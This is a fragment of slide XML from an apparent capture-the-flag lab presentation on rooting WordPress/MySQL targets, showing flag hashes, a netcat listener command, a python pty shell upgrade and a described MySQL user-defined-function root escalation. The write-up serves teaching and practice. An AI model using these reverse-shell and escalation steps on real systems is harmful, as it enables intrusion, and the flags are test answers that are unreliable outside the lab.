              <a:t>&lt;Flag2&gt; 6a8ed560f0b5358ecf844108048eb337</a:t>
            </a:r>
            <a:endParaRPr sz="3300" b="1">
              <a:solidFill>
                <a:srgbClr val="1155CC"/>
              </a:solidFill>
              <a:highlight>
                <a:srgbClr val="CCCCCC"/>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800" b="1">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t>Exploit used: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" b="1">
                <a:solidFill>
                  <a:srgbClr val="CC0000"/>
                </a:solidFill>
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t>Netcat reverse shell/remote execution vulnerability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fade">
                                      <p:cBhvr>
                                        <p:cTn id="7" dur="1000"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="33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38"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:animEffect transition="in" filter="fade">
                                      <p:cBhvr>
                                        <p:cTn id="11" dur="1000"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="33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41"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:animEffect transition="in" filter="fade">
                                      <p:cBhvr>
                                        <p:cTn id="15" dur="1000"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="34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42"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:animEffect transition="in" filter="fade">
                                      <p:cBhvr>
                                        <p:cTn id="19" dur="1000"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="342"/>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40"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:animEffect transition="in" filter="fade">
                                      <p:cBhvr>
                                        <p:cTn id="23" dur="2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1"/>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rmAutofit fontScale="40000" lnSpcReduction="20000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="3200"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" b="1"/>
              <a:t>Exploit images </a:t>
            </a:r>
            <a:endParaRPr b="1"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="349" name="Google Shape;349;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24</a:t>
            </a:fld>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="350" name="Google Shape;350;p41"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="13671125" y="3383500"/>
            <a:ext cx="9362622" cy="9180525"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
          <a:effectLst>
            <a:outerShdw blurRad="357188" dist="76200" dir="5400000" algn="bl" rotWithShape="0">
              <a:srgbClr val="000000">
                <a:alpha val="50000"/>
              </a:srgbClr>
            </a:outerShdw>
          </a:effectLst>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="351" name="Google Shape;351;p4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76325" y="10870100"/>
            <a:ext cx="12306925" cy="2106850"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
          <a:effectLst>
            <a:outerShdw blurRad="357188" dist="76200" dir="5400000" algn="bl" rotWithShape="0">
              <a:srgbClr val="000000">
                <a:alpha val="50000"/>
              </a:srgbClr>
            </a:outerShdw>
          </a:effectLst>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="352" name="Google Shape;352;p41"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId5" cstate="print">
            <a:alphaModFix/>
            <a:extLst>
              <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main"/>
              </a:ext>
            </a:extLst>
          </a:blip>
          <a:srcRect t="1228" r="10055" b="4307"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1076325" y="2999850"/>
            <a:ext cx="12306924" cy="5670050"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
          <a:effectLst>
            <a:outerShdw blurRad="357188" dist="76200" dir="5400000" algn="bl" rotWithShape="0">
              <a:srgbClr val="000000">
                <a:alpha val="50000"/>
              </a:srgbClr>
            </a:outerShdw>
          </a:effectLst>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="353" name="Google Shape;353;p41"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="-32800" y="0"/>
            <a:ext cx="253482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Clr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1100"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="7000">
                <a:solidFill>
                  <a:srgbClr val="CC0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Exploitation: Reverse shell/remote execution vulnerability</a:t>
            </a:r>
            <a:endParaRPr sz="7000">
              <a:solidFill>
                <a:srgbClr val="CC0000"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr sz="7000">
              <a:solidFill>
                <a:srgbClr val="CC0000"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="354" name="Google Shape;354;p4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076325" y="8896900"/>
            <a:ext cx="12306925" cy="1670006"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
          <a:effectLst>
            <a:outerShdw blurRad="357188" dist="7620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4"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:animEffect transition="in" filter="fade">
                                      <p:cBhvr>
                                        <p:cTn id="11" dur="500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="3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1"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:animEffect transition="in" filter="fade">
                                      <p:cBhvr>
                                        <p:cTn id="15" dur="500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="35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0"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:animEffect transition="in" filter="fade">
                                      <p:cBhvr>
                                        <p:cTn id="19"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2"/>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None/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="7000">
                <a:solidFill>
                  <a:srgbClr val="CC0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Exploit: Unrestricted Access to WordPress directories </a:t>
            </a:r>
            <a:endParaRPr sz="7000">
              <a:solidFill>
                <a:srgbClr val="CC0000"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="361" name="Google Shape;361;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25</a:t>
            </a:fld>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="362" name="Google Shape;362;p42"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1085850" y="2171800"/>
            <a:ext cx="115761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b="1">
                <a:solidFill>
                  <a:srgbClr val="1155CC"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="CCCCCC"/>
                </a:highlight>
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t>&lt;Flag3&gt; a0f568aa9de277887f37730d71520d9b</a:t>
            </a:r>
            <a:endParaRPr sz="2800" b="1">
              <a:solidFill>
                <a:srgbClr val="1155CC"/>
              </a:solidFill>
              <a:highlight>
                <a:srgbClr val="CCCCCC"/>
              </a:highlight>
              <a:latin typeface="Roboto"/>
              <a:ea typeface="Roboto"/>
              <a:cs typeface="Roboto"/>
              <a:sym typeface="Roboto"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="3300" b="1">
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t>Exploit used: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3300" b="1">
                <a:solidFill>
                  <a:srgbClr val="CC0000"/>
                </a:solidFill>
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t>Unrestricted access to WordPress directories</a:t>
            </a:r>
            <a:endParaRPr sz="2800" b="1">
              <a:solidFill>
                <a:srgbClr val="1155CC"/>
              </a:solidFill>
              <a:latin typeface="Roboto"/>
              <a:ea typeface="Roboto"/>
              <a:cs typeface="Roboto"/>
              <a:sym typeface="Roboto"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="363" name="Google Shape;363;p42"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1123950" y="8071550"/>
            <a:ext cx="12789600" cy="4825200"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst>
              <a:gd name="adj" fmla="val 16667"/>
            </a:avLst>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="AFCA54"/>
          </a:solidFill>
          <a:ln w="9525" cap="flat" cmpd="sng">
            <a:solidFill>
              <a:schemeClr val="dk2"/>
            </a:solidFill>
            <a:prstDash val="solid"/>
            <a:round/>
            <a:headEnd type="none" w="sm" len="sm"/>
            <a:tailEnd type="none" w="sm" len="sm"/>
          </a:ln>
          <a:effectLst>
            <a:outerShdw blurRad="471488" dist="952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800" b="1">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t>Steps &amp; Commands:</a:t>
            </a:r>
            <a:endParaRPr sz="280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28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800" b="1">
                <a:solidFill>
                  <a:srgbClr val="1155CC"/>
                </a:solidFill>
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t>&gt;nc -lvp 4444</a:t>
            </a:r>
            <a:endParaRPr sz="2800" b="1">
              <a:solidFill>
                <a:srgbClr val="1155CC"/>
              </a:solidFill>
              <a:latin typeface="Roboto"/>
              <a:ea typeface="Roboto"/>
              <a:cs typeface="Roboto"/>
              <a:sym typeface="Roboto"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2800" b="1">
                <a:solidFill>
                  <a:srgbClr val="1155CC"/>
                </a:solidFill>
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t>&gt;/var/www/html</a:t>
            </a:r>
            <a:endParaRPr sz="2800" b="1">
              <a:solidFill>
                <a:srgbClr val="1155CC"/>
              </a:solidFill>
              <a:latin typeface="Roboto"/>
              <a:ea typeface="Roboto"/>
              <a:cs typeface="Roboto"/>
              <a:sym typeface="Roboto"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="0" indent="-406400" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="115000"/>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Find </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" b="1">
                <a:solidFill>
                  <a:srgbClr val="1155CC"/>
                </a:solidFill>
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t>/var/www -type f -iname ‘flag*’</a:t>
            </a:r>
            <a:endParaRPr sz="2800" b="1">
              <a:solidFill>
                <a:srgbClr val="1155CC"/>
              </a:solidFill>
              <a:latin typeface="Roboto"/>
              <a:ea typeface="Roboto"/>
              <a:cs typeface="Roboto"/>
              <a:sym typeface="Roboto"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="0" indent="-406400" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="2800"/>
              <a:buFont typeface="Roboto"/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2800">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t>It gave us a URL path that we followed to capture flag3</a:t>
            </a:r>
            <a:endParaRPr sz="28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2800" b="1">
                <a:solidFill>
                  <a:srgbClr val="1155CC"/>
                </a:solidFill>
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t>&gt;http://192.168.1.115/wordpress/wp-content/uploads/2018/11/flag3.png</a:t>
            </a:r>
            <a:endParaRPr sz="2800" b="1">
              <a:solidFill>
                <a:srgbClr val="1155CC"/>
              </a:solidFill>
              <a:latin typeface="Roboto"/>
              <a:ea typeface="Roboto"/>
              <a:cs typeface="Roboto"/>
              <a:sym typeface="Roboto"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="0" indent="0" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr sz="2800">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
              <a:latin typeface="Roboto"/>
              <a:ea typeface="Roboto"/>
              <a:cs typeface="Roboto"/>
              <a:sym typeface="Roboto"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="364" name="Google Shape;364;p4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62559" y="3613225"/>
            <a:ext cx="12750991" cy="4038750"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
          <a:effectLst>
            <a:outerShdw blurRad="471488" dist="95250" dir="5400000" algn="bl" rotWithShape="0">
              <a:srgbClr val="000000">
                <a:alpha val="50000"/>
              </a:srgbClr>
            </a:outerShdw>
          </a:effectLst>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="365" name="Google Shape;365;p4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4287475" y="8829125"/>
            <a:ext cx="9534276" cy="3870875"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
          <a:effectLst>
            <a:outerShdw blurRad="471488" dist="95250" dir="5400000" algn="bl" rotWithShape="0">
              <a:srgbClr val="000000">
                <a:alpha val="50000"/>
              </a:srgbClr>
            </a:outerShdw>
          </a:effectLst>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="366" name="Google Shape;366;p42"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId5">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="14287475" y="3613225"/>
            <a:ext cx="9358723" cy="4600323"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
          <a:effectLst>
            <a:outerShdw blurRad="471488" dist="952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3"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:animEffect transition="in" filter="fade">
                                      <p:cBhvr>
                                        <p:cTn id="11" dur="1000"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="36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65"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:animEffect transition="in" filter="fade">
                                      <p:cBhvr>
                                        <p:cTn id="15" dur="1000"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="365"/>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62"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:animEffect transition="in" filter="fade">
                                      <p:cBhvr>
                                        <p:cTn id="19" dur="1000"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="362"/>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66"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:animEffect transition="in" filter="fade">
                                      <p:cBhvr>
                                        <p:cTn id="23" dur="10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None/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="7000">
                <a:solidFill>
                  <a:srgbClr val="CC0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Rooting Target 2: </a:t>
            </a:r>
            <a:endParaRPr sz="7000">
              <a:solidFill>
                <a:srgbClr val="CC0000"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="373" name="Google Shape;373;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26</a:t>
            </a:fld>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="374" name="Google Shape;374;p43"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1085850" y="2171800"/>
            <a:ext cx="168555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0" b="1">
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t>Exploit used: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="5000" b="1">
                <a:solidFill>
                  <a:srgbClr val="CC0000"/>
                </a:solidFill>
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t>Establishing a full http shell &amp; Exploit</a:t>
            </a:r>
            <a:endParaRPr sz="5000" b="1">
              <a:solidFill>
                <a:srgbClr val="1155CC"/>
              </a:solidFill>
              <a:latin typeface="Roboto"/>
              <a:ea typeface="Roboto"/>
              <a:cs typeface="Roboto"/>
              <a:sym typeface="Roboto"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="375" name="Google Shape;375;p43"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1155000" y="3745875"/>
            <a:ext cx="10310400" cy="24174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71488" dist="952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800" b="1">
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t>Step #1 Establishing a full ttp shell within the netcat reverse shell. To do this we ran the code:</a:t>
            </a:r>
            <a:endParaRPr sz="2800" b="1">
              <a:latin typeface="Roboto"/>
              <a:ea typeface="Roboto"/>
              <a:cs typeface="Roboto"/>
              <a:sym typeface="Roboto"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2800" b="1">
                <a:solidFill>
                  <a:srgbClr val="1155CC"/>
                </a:solidFill>
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t>&gt;python -c ‘import pty; pty.spawn(“/bin/bash/”)’ www-data@precise64:/tmp$^Z.</a:t>
            </a:r>
            <a:endParaRPr sz="2800">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
              <a:latin typeface="Roboto"/>
              <a:ea typeface="Roboto"/>
              <a:cs typeface="Roboto"/>
              <a:sym typeface="Roboto"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="376" name="Google Shape;376;p43"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1155000" y="6783050"/>
            <a:ext cx="10310400" cy="19509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71488" dist="952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800" b="1">
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t>Step #2 Confirming if MySQL was still running as root like it was on the first target machine.</a:t>
            </a:r>
            <a:endParaRPr sz="2800">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
              <a:latin typeface="Roboto"/>
              <a:ea typeface="Roboto"/>
              <a:cs typeface="Roboto"/>
              <a:sym typeface="Roboto"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="377" name="Google Shape;377;p43"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1155000" y="9353725"/>
            <a:ext cx="10310400" cy="2417400"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst>
              <a:gd name="adj" fmla="val 16667"/>
            </a:avLst>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="FFE599"/>
          </a:solidFill>
          <a:ln w="9525" cap="flat" cmpd="sng">
            <a:solidFill>
              <a:schemeClr val="dk2"/>
            </a:solidFill>
            <a:prstDash val="solid"/>
            <a:round/>
            <a:headEnd type="none" w="sm" len="sm"/>
            <a:tailEnd type="none" w="sm" len="sm"/>
          </a:ln>
          <a:effectLst>
            <a:outerShdw blurRad="471488" dist="95250" dir="5400000" algn="bl" rotWithShape="0">
              <a:srgbClr val="000000">
                <a:alpha val="50000"/>
              </a:srgbClr>
            </a:outerShdw>
          </a:effectLst>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US" sz="2800" b="1">
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t>Step #3 MySQL runs as root we needed to find an exploit that works for MySQL. This exploit uses user defined function to add a new command into MySQL, in this case a script file to escalate to root.</a:t>
            </a:r>
            <a:endParaRPr sz="2800" b="1">
              <a:latin typeface="Roboto"/>
              <a:ea typeface="Roboto"/>
              <a:cs typeface="Roboto"/>
              <a:sym typeface="Roboto"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="378" name="Google Shape;378;p4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2172775" y="3874700"/>
            <a:ext cx="11548493" cy="7790525"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
          <a:effectLst>
            <a:outerShdw blurRad="271463" dist="571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1000"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="37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75"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:animEffect transition="in" filter="fade">
                                      <p:cBhvr>
                                        <p:cTn id="11" dur="1000"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="37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76"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:animEffect transition="in" filter="fade">
                                      <p:cBhvr>
                                        <p:cTn id="15" dur="1000"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="37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77"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:animEffect transition="in" filter="fade">
                                      <p:cBhvr>
                                        <p:cTn id="19" dur="1000"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="37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78"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
